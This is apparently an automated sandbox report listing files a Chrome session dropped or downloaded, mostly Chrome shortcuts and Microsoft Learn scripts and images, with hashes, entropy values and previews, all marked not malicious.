                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,....5.#:.>..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IxY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VxY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VxY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VxY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VxY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........7..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2693
                                                                                                                                                                                                Entropy (8bit):4.003196088074795
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:8x8odhQTB0yDbsHqidAKZdA14tseh7sFiZUkmgqeh7sfy+BX:8xEHHnFy
                                                                                                                                                                                                MD5:316C90CBC1A7DDCE8EB369203967E96A
                                                                                                                                                                                                SHA1:129BCFDA14940112A9DFE66947A6E8F79739120C
                                                                                                                                                                                                SHA-256:7454316C2A4648851EA20B5BAF016E931D37C296D21DE6CEE5F8765D9CD83C22
                                                                                                                                                                                                SHA-512:8DACB3651990EA068C64D488F648B95A9151A67A62B4B1EBCA85BD198069E7F3099EDD66445AE13D4A2E13FD32F36386D6D0CFB66A8C1FFA4B9A5D2C3ED272B1
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IxY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VxY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VxY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VxY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........7..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 24 01:04:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                Entropy (8bit):3.988671514030551
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:8QodhQTB0yDbaHqidAKZdA1vehDiZUkwqehty+R:84HmHy
                                                                                                                                                                                                MD5:8A2CFDA72E0FCF9D4742D44FED8F265D
                                                                                                                                                                                                SHA1:46F842A593A9DA168A9CF7B196B8787E3AD809E5
                                                                                                                                                                                                SHA-256:C8EC918C0E393457A6009A96F9F96C00C43253B519AB1530812B0114506B6C00
                                                                                                                                                                                                SHA-512:C7571A2938C21A42E3AF8813DBEA7F43472FA007994CB1F606C828251C0F6121362F7B313CCF918244B0F79390318D6A8E2C123A7EEFD3C6600FFB45EC88AFC6
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.......:.>..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IxY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VxY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VxY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VxY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VxY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........7..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 24 01:04:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                Entropy (8bit):3.9787650835907886
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:8jodhQTB0yDbaHqidAKZdA1hehBiZUk1W1qeh7y+C:8dHm9by
                                                                                                                                                                                                MD5:5AD280C6B1EBC2C97011BDE9D647F7D8
                                                                                                                                                                                                SHA1:281AEA18711CE5DE78B4070038B3250883E815FD
                                                                                                                                                                                                SHA-256:20DF3FA5845405665F70B61164F5D364E8D4BA2F464C2E8B181C307045C2BF5D
                                                                                                                                                                                                SHA-512:32703F3A93FDA340E3C5D3C78743D2951A7C59CC0E4ADD8B9FF07786EAE76690C41769E994F5244DF577DCC5A5F280589946EDF2C1101C4BE9C6473116E0943F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......-:.>..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IxY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VxY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VxY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VxY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VxY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........7..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 24 01:04:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2683
                                                                                                                                                                                                Entropy (8bit):3.9901787842348693
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:8UodhQTB0yDbaHqidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbFy+yT+:88H4T/TbxWOvTbFy7T
                                                                                                                                                                                                MD5:956279AD0353014C946BE558671F17CE
                                                                                                                                                                                                SHA1:AFF00E7205B02092B59C2E88E60EC0350A1D74FE
                                                                                                                                                                                                SHA-256:866CDACE5282FF498F5B9D5E0624044BF88B1382D3702E0DE37B48E3572524CC
                                                                                                                                                                                                SHA-512:ED94153801109F44CD179868C94D05D952B04D624D06DD6779BBAFC8BB9559CED3669F9C56F269E3443DFB78A0F283D02992F013B1FB2441E75C80462994D7C8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,....8..:.>..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IxY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VxY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VxY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VxY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VxY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........7..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):207935
                                                                                                                                                                                                Entropy (8bit):5.420780972514107
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from TOPS/20, original size modulo 2^32 25441
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):4838
                                                                                                                                                                                                Entropy (8bit):7.9574820676735065
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:T/6L2x+2p9tqVdd66l5UoWws4fB9G4wd88gpNvKrv2gWC:T/Lg2VQdd66nxfB9GvdCM+5C
                                                                                                                                                                                                MD5:DEE0B34CA973D7246A8A07F9EF5C81F0
                                                                                                                                                                                                SHA1:204D6952E0378C110044E799445B9ECD92F54C90
                                                                                                                                                                                                SHA-256:C0E2E812FD38B620A31178230B45FE84F0105131C4F04C65F6EC0614594CA72C
                                                                                                                                                                                                SHA-512:847289B9A3E0FAAC7B8CC75D0DA6632597FE92335E77565CEFC240122F213E93AD60C20BAA42B239269A2634C1977BA7E6785B442840A271A8260E8786BD71EB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                Preview:...........]ks.F..+..~..D.|.jkJ...S.l2........4......$.I........ )D.<SJ%6..........(....._:~.e".:o~.d.....w..5.0.)..../X*....[..8..6.Af+&..>&|)..Q..i|'"...N].kq/.8Yc.&...K.x...X.3..{.6q.V....v...ZK..<..7..*q..c...X..v!.......~.p....iN.\G.8..:.w..Qp....}.q{...u.....'.Jx..]....P....D..uC.....E...dJ?..,.Y.'R..;...OeR.T~I....J.aw.Q0.~..VqT6..m.s..-:CL.....Y...uz..[wXlf@....2@.`K.GFNA..<...j0 ...T,.+"'W].)Zw...K..no4...i7[.G.s.g....(.....j.d...39q..I.3l*.....W)..h..J.e.j..$a7"..._ .0.....T.o..z.O.........f.gq....a.Lap...O..........'v....w.x.[w..O..t]..jh+N7.K...G].9O...Q.................{..{q..,K.n......p.a..L.]..E..]..o...`.....r..d..R7...[..i...,3.1W.......".Re8.(~.P...... .4V."cz@V......@j....e.0u'.P..m.bvV...NzD..-e.C6...o.x..t.z.7.H..$.........|......;....x.....^.0u..z..]@..i..I...7.7.1K..d...G]".#.L'..l..7s..@.....S.`..1......{..!.c...J...^o2.<..........9X..../..b......m..%$.9L..L.I...08.i\...w D........@.`/tC".C..."..,....i.Ep`..24p4.=..
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                Entropy (8bit):7.784472070227724
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):52717
                                                                                                                                                                                                Entropy (8bit):5.462668685745912
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):4.986131881931089
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):52717
                                                                                                                                                                                                Entropy (8bit):5.462668685745912
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1173007
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):265983
                                                                                                                                                                                                Entropy (8bit):7.998494035887672
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:6144:/mXLhIXSf1AwuU0VtSDf0Zmsq49PDdIfB92UQg:/0LhIXJTU0V2fURkqg
                                                                                                                                                                                                MD5:9304479F25D8F8AF6BDA260A6F8BDA4E
                                                                                                                                                                                                SHA1:54828173C5933B5DC8CC464D635FF59501B0D667
                                                                                                                                                                                                SHA-256:7BA3DE2A2DEC667CEE6C3C5B88D10C7C58E5E658545BEEC7A4E0F7191D18D3A9
                                                                                                                                                                                                SHA-512:57D06CC8116647136298A3F0588DDFE6533DC617497EFCA471317F19A0CCED0975B146AD7837ED84669CDD3549565611C7068F8C48A1E803BDD32350172F65A6
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                Preview:............w..(.W$|.j.1Ds.J.G.c...v,%7../D6%. ........U..7p.e.3.."z.....j.<K.e..~p....U.y<,..(....3..F..&.h.....mg.....yp...0..q....6>| _J....;?......<.J.o..A.e. ..<+..fJ...n?|.......<N.2J.$.o=...fgGo.l..}2...s.Y....8."..q*.k\G..)t?%yy..FI..vv.."......C..<....'R..>6..$;;.,I..}...y.y+%...!.4.a8..$*.-...OQ2#[.3.|z......[iVnE[..f..e.o...]/.>.rX6.n.\.....<.X..#:....$*....s...~.8.<..a./,.>.J.@....ZE.j%...V....j6!iY4..^......?z....]........p..A...+.a........iX.B.$.gd...~..}..g7..,....W#.I..Z.z.".y .... ..X..z......B......V......n...l.&..).....Q..^P4....O.....0*.....K...|>.S.....O...V.......4.....<.;..5hk.9.E1.#.X...Ew..3$..R~w...+.W.iG.`B.*d...Pa.......%%.....$....MX. L......6.5.."$..(p...)./B......b....7.'$JH4..rg.Kg.K.WM..X..-.@..zP5../.#..."..-.B.......B..6 ..O..c.L.!:..4..g.L...@.2jx....(K.;...3.xEO.O.j...4...(...y5I........WQy.,.R.y...SG...LD..x.c.A._."F...Aw..{{.{A8._.... ...v....}.l.ZK*`s..u...;L..&..8...H.....9+IQ.W..e]a./...`
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):13339
                                                                                                                                                                                                Entropy (8bit):7.683569563478597
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
